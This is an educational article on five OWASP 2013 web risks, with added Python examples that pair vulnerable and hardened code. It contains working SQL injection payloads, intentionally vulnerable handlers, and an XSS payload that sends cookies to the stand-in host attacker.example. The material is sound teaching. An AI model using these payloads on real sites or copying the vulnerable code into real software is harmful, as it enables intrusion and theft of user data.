Much as we would like to think otherwise, our online identities are just one hack away from falling into unscrupulous hands. The websites we trust with our most personal information – our birthdates, our home addresses, our credit card details, even our social security numbers – are not as bulletproof as we would like them to be.
2013 saw a trend of increasingly sophisticated security breaches that took so many different forms that it was hard to keep track of them all. From malware that installed itself silently on your machine, to DDoS attacks that caught networks unprepared, to phishing attacks that grew alarmingly more believable, we lived through a year of many firsts.
If being an internet user now means living under constant threat of one online crisis after another, being a website owner is doubly dangerous. Not only are you in danger of losing your own data, but you are also liable for what criminals do with your customers’ data. Target’s breach in late 2013 is the obvious example: card data for over 40 million debit and credit card holders was stolen, and the losses ran into the millions during that year’s holiday season.
While almost no type of website is safe from attacks by cyber criminals, there are some industries that are more vulnerable than most.
Let’s take a closer look at the top 5 security threats that an average website is vulnerable to, according to the Open Web Application Security Project (OWASP) Top 10 for 2013.
SQL injection
This is one of the oldest forms of web attack. The idea behind SQL injection is to read (or alter) critical information in a website’s database. The attacker exploits a flaw in the site’s code that builds a database query by pasting user input into the query text: the input is crafted so that it contains SQL of the attacker’s choosing, and the database executes that SQL along with the query the developer intended.
The usual entry points are form fields, URL parameters, cookies and headers – anywhere user input reaches a query without being bound as a parameter or otherwise kept separate from the SQL. Filtering special characters is a weak substitute for parameterised queries, which keep data and code apart by construction.
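The two patterns side by side, as an added example that is not from the original article: a profile lookup that pastes the username into the query text, and the same lookup with the value bound as a parameter. The users table, its rows and the two payloads are constructed for the demonstration, and sqlite3 stands in for whatever database the site actually uses.

```python
import sqlite3


def make_db():
    """Constructed sample database for this demonstration (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, ssn TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, ssn) VALUES (?, ?)",
        [("alice", "000-00-0001"), ("bob", "000-00-0002")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """The root cause of SQL injection: the user-supplied value is pasted into
    the query text, so a quote character in the input changes the query's
    structure instead of being part of a string literal."""
    query = "SELECT username, ssn FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, username):
    """Hardened form: the query text is fixed and the value is bound as a
    parameter, so the database treats it strictly as data, never as SQL."""
    query = "SELECT username, ssn FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


# Two classic payloads (constructed). The first turns the WHERE clause into a
# tautology and dumps every row; the second appends a UNION that reads table
# definitions out of sqlite_master, which is how an attacker maps a database
# they cannot otherwise see. In the second, "--" comments out the closing
# quote that the vulnerable code appends.
TAUTOLOGY = "' OR '1'='1"
SCHEMA_DUMP = "' UNION SELECT name, sql FROM sqlite_master --"

if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "alice"))      # legitimate use works...
    print(lookup_vulnerable(conn, TAUTOLOGY))    # ...but so does dumping every row
    print(lookup_vulnerable(conn, SCHEMA_DUMP))  # ...and reading the schema
    print(lookup_safe(conn, TAUTOLOGY))          # []: the payload is just a string
```

The safe version is not "escaping done right"; it is a different mechanism. The SQL text is parsed before the value is ever seen, so there is no character the attacker can send that changes what the query does.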
Broken authentication and session management
This category covers flaws in how a website logs users in and keeps track of them afterwards. Attackers use gaps in the authentication and session management code to take over existing accounts, rather than attacking the database directly.
Session management and user authentication cover checking who a user is when they log in, typically with a username and password, and then recognising that user on every later request by means of a session identifier. Stronger factors such as one-time codes or hardware tokens exist, but their cost and friction have kept passwords the default on most sites.
A session can be weak in many places: passwords stored in plain text or with a fast, unsalted hash instead of a slow, salted one; weak password reset and recovery processes; no automatic session timeout; session IDs exposed in the URL (where they land in logs, browser history and Referer headers); session IDs that are predictable; sessions that are not invalidated on logout; and so on. An attacker who obtains or guesses a valid session ID is the user as far as the site is concerned, with access to the identity and data associated with that account.
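What the opposite of those weaknesses looks like in code, as an added example that is not from the original article: salted, slow password hashing with a constant-time comparison, and a server-side session store whose IDs come from the OS random source, expire after inactivity and are destroyed on logout. The user table and the injectable clock are constructed for the demonstration; the surrounding web framework and cookie handling are assumed, not shown.

```python
import hashlib
import hmac
import os
import secrets
import time

PBKDF2_ROUNDS = 600_000  # deliberately slow; raise it as hardware gets faster


def hash_password(password, salt=None):
    """Store a salted, slow hash of the password, never the password itself
    and not reversible encryption: a leaked table then yields nothing directly
    usable, and two users with the same password get different digests."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(password, salt, digest):
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison


class SessionStore:
    """Server-side sessions keyed by an unguessable ID. The ID is meant to
    travel in a cookie (HttpOnly, Secure), never in the URL, where it would
    end up in logs, browser history and Referer headers."""

    def __init__(self, idle_timeout=900, clock=time.time):
        self.idle_timeout = idle_timeout  # seconds of inactivity before expiry
        self.clock = clock                # injectable so the timeout can be tested
        self._sessions = {}

    def create(self, username):
        sid = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": username, "last_seen": self.clock()}
        return sid

    def user_for(self, sid):
        """Return the logged-in user for a session ID, or None if the session
        is unknown, was logged out, or has been idle past the timeout."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        now = self.clock()
        if now - entry["last_seen"] > self.idle_timeout:
            del self._sessions[sid]
            return None
        entry["last_seen"] = now
        return entry["user"]

    def logout(self, sid):
        """Logout must destroy the server-side session, not just the cookie."""
        self._sessions.pop(sid, None)


def login(store, users, username, password):
    """Check the password against the stored hash and open a fresh session on
    success. 'users' maps username -> (salt, digest); hypothetical store."""
    record = users.get(username)
    if record is None or not verify_password(password, *record):
        return None
    return store.create(username)


if __name__ == "__main__":
    users = {"alice": hash_password("correct horse battery staple")}  # constructed
    store = SessionStore(idle_timeout=900)
    sid = login(store, users, "alice", "correct horse battery staple")
    print(store.user_for(sid))   # alice
    store.logout(sid)
    print(store.user_for(sid))   # None
```

Creating a new session ID at login (rather than reusing whatever ID the browser already had) also closes off session fixation, where the attacker plants an ID they know before the victim logs in.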
Cross site scripting
Cross Site Scripting (XSS) is a flaw in the web application, not in the user’s browser: the site takes attacker-controlled input (a search term, a comment, a profile field) and writes it into a page without encoding it, so the browser treats it as HTML or script coming from the site itself. In reflected XSS the payload travels in a link the victim must be lured into clicking; in stored XSS it sits in the site’s database and runs for every visitor who views the affected page.
Cross Site Scripting is usually employed alongside phishing and social engineering. Script running inside the victim’s page can read session cookies, submit forms and make requests in the user’s name, which is how attackers reach the financial and personal data behind a logged-in session.
It can be quite tough to identify and root out Cross Site Scripting from an affected website, because the injection can arrive through many inputs and land in many different contexts (HTML text, attributes, JavaScript, URLs), each of which needs its own encoding. Carry out regular security reviews of your site’s code, encode output for the context it lands in, set a Content Security Policy as a second line of defence, and consider a web application firewall such as this one from Incapsula to nip such attacks in the bud.
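Reflected XSS and its fix in a search results page, as an added example that is not from the original article. The two attacker inputs are constructed: one injects a script tag into page text, the other breaks out of a quoted attribute, which is why encoding has to be chosen for the context the value lands in. The response headers are an assumed shape, not any particular framework’s API.

```python
import html

# Constructed attacker inputs for the demonstration.
SCRIPT_PAYLOAD = (
    "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
)
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_results_vulnerable(query):
    """Reflects the search term straight into the page: reflected XSS. A link
    carrying the payload as ?q=... runs it in every victim's browser."""
    return f'<input name="q" value="{query}"><p>Results for {query}</p>'


def render_results_safe(query):
    """Encode for the context the value lands in. html.escape(quote=True) is
    right for text nodes and double-quoted attribute values; JavaScript, URL
    and CSS contexts each need their own encoder and are not covered here."""
    q = html.escape(query, quote=True)
    return f'<input name="q" value="{q}"><p>Results for {q}</p>'


# Defence in depth: a Content Security Policy that forbids inline script means
# an encoding slip on one page still cannot execute attacker-supplied JavaScript.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    "X-Content-Type-Options": "nosniff",
}


def respond(query):
    """Assemble a (headers, body) pair the way a request handler would."""
    return SECURITY_HEADERS, render_results_safe(query)


if __name__ == "__main__":
    print(render_results_vulnerable(SCRIPT_PAYLOAD))    # live <script> in the page
    print(render_results_safe(SCRIPT_PAYLOAD))          # &lt;script&gt; as visible text
    print(render_results_vulnerable(ATTRIBUTE_PAYLOAD)) # attribute broken out of
    print(render_results_safe(ATTRIBUTE_PAYLOAD))       # payload stays inside value="..."
```

Note that the attribute payload contains no angle brackets at all, so a filter that only strips `<script>` would let it through; the fix is encoding the quote character, which is what `quote=True` does.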
Insecure direct object reference
When a website exposes the actual key of an internal object – a file path, a database record ID, an account number – to an external user, it opens itself up to an Insecure Direct Object Reference attack.
This happens when such objects are referenced in a URL or form parameter that any user can see and edit. All an attacker has to do is change the referenced key (say, invoice 1001 to invoice 1002) to reach another user’s data, unless the server checks on every request that the requester is allowed to see that particular object.
This is an extremely easy attack to execute, and equally easy to prevent. Being logged in is not enough: the server must verify, on every request that resolves a reference, that this user is authorised for this specific object, and it should answer the same way for objects that do not exist and objects that belong to someone else, so the response does not confirm which IDs exist. Where possible, replace raw keys in URLs with opaque, per-user references that the server maps back to the real object.
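The vulnerable handler, the authorised one, and the indirect-reference alternative, as an added example that is not from the original article. The invoice records, the user names and the `NotFound` exception are constructed for the demonstration; a real handler would turn the exception into a 404.

```python
import secrets

# Constructed records for the demonstration: the invoice number is the kind of
# internal key that ends up in URLs such as /invoices/1002.
INVOICES = {
    1001: {"owner": "alice", "amount": 120.00},
    1002: {"owner": "bob", "amount": 75.50},
}


class NotFound(Exception):
    """Raised for missing and for foreign records alike (hypothetical)."""


def get_invoice_vulnerable(current_user, invoice_id):
    """IDOR: the handler checks that someone is logged in but never that the
    record belongs to them, so alice reads bob's invoice by editing the number."""
    if current_user is None:
        raise NotFound
    return INVOICES[invoice_id]


def get_invoice_safe(current_user, invoice_id):
    """The fix is an authorization check on every request that resolves a
    reference. Answering 'not found' for both missing and foreign records
    keeps the response from confirming which IDs exist."""
    record = INVOICES.get(invoice_id)
    if current_user is None or record is None or record["owner"] != current_user:
        raise NotFound
    return record


class IndirectReferences:
    """Alternative: hand the client a per-user opaque token instead of the key.
    The token is useless to any other user and reveals nothing about the keyspace.
    The mapping would normally live in the session; a dict stands in here."""

    def __init__(self):
        self._map = {}  # (user, token) -> invoice_id

    def token_for(self, user, invoice_id):
        token = secrets.token_urlsafe(16)
        self._map[(user, token)] = invoice_id
        return token

    def resolve(self, user, token):
        invoice_id = self._map.get((user, token))
        if invoice_id is None:
            raise NotFound
        # Still authorise on the real key: the token only narrows the search.
        return get_invoice_safe(user, invoice_id)


if __name__ == "__main__":
    print(get_invoice_vulnerable("alice", 1002))  # bob's invoice leaks
    try:
        get_invoice_safe("alice", 1002)
    except NotFound:
        print("alice cannot read invoice 1002")
```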
Security misconfiguration
An average website today is not a single layer of code running on your chosen servers. It typically consists of many layers: the web platform, server, database, framework, APIs, plugins, custom code, and so on. To have a secure website, each layer needs to be configured securely in its own right.
Most plug-and-play platforms ship with security settings for every layer of the site. Security misconfiguration refers to mistakes in setting up access and authentication across those layers: leaving default credentials in place, getting firewall rules and exceptions wrong, running with debug output or directory listing enabled, failing to apply the latest security patches, and so on.
When the configuration is wrong, attackers walk in through default accounts, forgotten pages, unpatched software or unprotected sections of your site.
These easy-to-exploit holes are also quite easy to detect and fix. All it takes is persistence and thoroughness while setting up your website and its access controls. Delete apps and plugins you do not use. Delete defunct accounts so they cannot be hijacked. Keep every component up to date with the latest patches. Use automated scanners as preventive maintenance to detect missing patches, default accounts and other misconfigurations, and repeat the scan after every deployment, since configuration drifts.
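A small configuration audit covering the checks listed above, as an added example that is not from the original article. The two configuration snapshots, the list of current vendor versions and the audit date are constructed, and the keys are hypothetical stand-ins for whatever a real CMS, framework or server exposes; the point is the shape of the checks, which a scanner runs on every deployment.

```python
import datetime

# Constructed configuration snapshots for the demonstration. The keys are
# hypothetical and stand in for whatever a CMS, framework or server exposes.
WEAK_CONFIG = {
    "debug": True,
    "directory_listing": True,
    "tls_min_version": "1.0",
    "accounts": [
        {"name": "admin", "password_changed": None, "last_login": "2014-01-14"},
        {"name": "dev_temp", "password_changed": "2013-06-01", "last_login": "2013-06-02"},
    ],
    "plugins": {"installed": ["seo", "gallery", "oldforum"], "enabled": ["seo"]},
    "components": {"cms": "3.1.2", "db_driver": "2.0.0"},
}

HARDENED_CONFIG = {
    "debug": False,
    "directory_listing": False,
    "tls_min_version": "1.2",
    "accounts": [
        {"name": "admin", "password_changed": "2013-12-20", "last_login": "2014-01-14"},
    ],
    "plugins": {"installed": ["seo"], "enabled": ["seo"]},
    "components": {"cms": "3.1.4", "db_driver": "2.0.0"},
}

# Current vendor releases and the date of the audit; both constructed.
LATEST_VERSIONS = {"cms": "3.1.4", "db_driver": "2.0.0"}
AUDIT_DATE = datetime.date(2014, 1, 15)


def version_tuple(version):
    """'3.1.2' -> (3, 1, 2) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def audit(config, latest_versions, today, stale_days=90):
    """Return a list of human-readable findings for one configuration snapshot.
    Each check corresponds to one of the misconfigurations discussed above."""
    findings = []
    if config.get("debug"):
        findings.append("debug mode enabled: stack traces and internals leak to users")
    if config.get("directory_listing"):
        findings.append("directory listing enabled: unused pages and backups are discoverable")
    if version_tuple(config.get("tls_min_version", "1.0")) < (1, 2):
        findings.append("TLS below 1.2 accepted: downgrade to known-weak protocol versions possible")
    for account in config.get("accounts", []):
        name = account["name"]
        if account.get("password_changed") is None:
            findings.append(f"account {name!r} still has its default password")
        idle = (today - datetime.date.fromisoformat(account["last_login"])).days
        if idle > stale_days:
            findings.append(f"account {name!r} unused for {idle} days: delete it")
    plugins = config.get("plugins", {})
    unused = set(plugins.get("installed", [])) - set(plugins.get("enabled", []))
    for plugin in sorted(unused):
        findings.append(f"plugin {plugin!r} installed but not enabled: remove it")
    for component, version in config.get("components", {}).items():
        latest = latest_versions.get(component)
        if latest and version_tuple(version) < version_tuple(latest):
            findings.append(f"{component} {version} is behind {latest}: apply the patch")
    return findings


if __name__ == "__main__":
    for finding in audit(WEAK_CONFIG, LATEST_VERSIONS, AUDIT_DATE):
        print("-", finding)
    print("hardened:", audit(HARDENED_CONFIG, LATEST_VERSIONS, AUDIT_DATE))  # []
```

An installed-but-disabled plugin still matters because its files remain on disk and reachable over HTTP; disabling it in the admin panel does not remove the attack surface, deleting it does.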
While there are many ways attackers can get into your site and misuse your data, there are just as many ways to protect against them. Staying on top of security threats takes secure coding to begin with, proactive vigilance to detect issues before they blow up in your face, and quick action to fix problems before they escalate into major breaches.
Image: Rajesh_India via Flickr.